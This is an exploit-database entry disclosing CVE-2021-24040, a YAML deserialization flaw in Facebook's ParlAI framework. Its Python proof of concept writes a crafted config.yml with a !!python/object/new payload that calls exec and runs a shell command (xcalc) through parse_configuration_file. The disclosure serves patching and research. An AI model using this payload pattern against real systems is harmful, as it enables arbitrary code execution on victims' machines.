# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai # Date: 2021-09-11 # Exploit Author: Abhiram V # Vendor Homepage: https://parl.ai/ # Software Link: https://github.com/facebookresearch/ParlAI # Version: < 1.1.0 # Tested on: Linux # CVE: CVE-2021-24040 # References : # https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg # | https://anon-artist.github.io/blogs/blog3.html | ############################################################################ Introduction ParlAI (pronounced “par-lay”) is a free, open-source python framework for sharing, training and evaluating AI models on a variety of openly available dialogue datasets. ############################################################################ Vulnerability details ############################################################################ Description ParlAI was vulnerable to YAML deserialization attack caused by unsafe loading which leads to Arbitrary Code Execution. Proof of Concept Create the following PoC file (exploit.py) import os #os.system('pip3 install parlai') from parlai.chat_service.utils import config exploit = """!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('xcalc')" """ open('config.yml','w+').write(exploit) config.parse_configuration_file('config.yml') Execute the python script ie, python3 exploit.py Impact Code Execution ############################################################################